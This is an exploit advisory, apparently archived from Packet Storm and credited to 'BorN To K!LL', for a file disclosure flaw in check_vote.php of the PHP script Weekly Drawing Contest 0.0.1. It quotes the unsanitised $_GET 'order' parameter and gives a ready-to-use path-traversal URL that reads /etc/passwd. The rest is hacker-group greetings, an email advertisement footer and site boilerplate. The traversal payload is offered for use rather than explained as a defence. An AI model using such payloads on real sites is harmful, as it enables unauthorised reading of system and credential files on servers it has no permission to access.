Weekly Drawing Contest version 0.0.1 suffers from a local file disclosure vulnerability.
269ced39d845301f13578c23834077900786be9da878c99474d4f2ff9514dc90+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
Weekly Drawing Contest <= (check_vote.php) Remote File Disclosure Vuln
Script: Weekly Drawing Contest
Version: 0.0.1
S!Te: http://www.hotscripts.com/jump.php?listing_id=52638&jump_type=1
Discover: BorN To K!LL
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
Bug in:
check_vote.php
Code:
$order = $_GET[ "order" ];
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
ExploiT:
~~~~~
wWw.SiTe.cOm/[path]/check_vote.php?order=../../../../etc/passwd
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
GreeTz 2:
Dr.2 - str0ke - AsbMay ....
KuW-SeC.cC & Asb-May.net
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed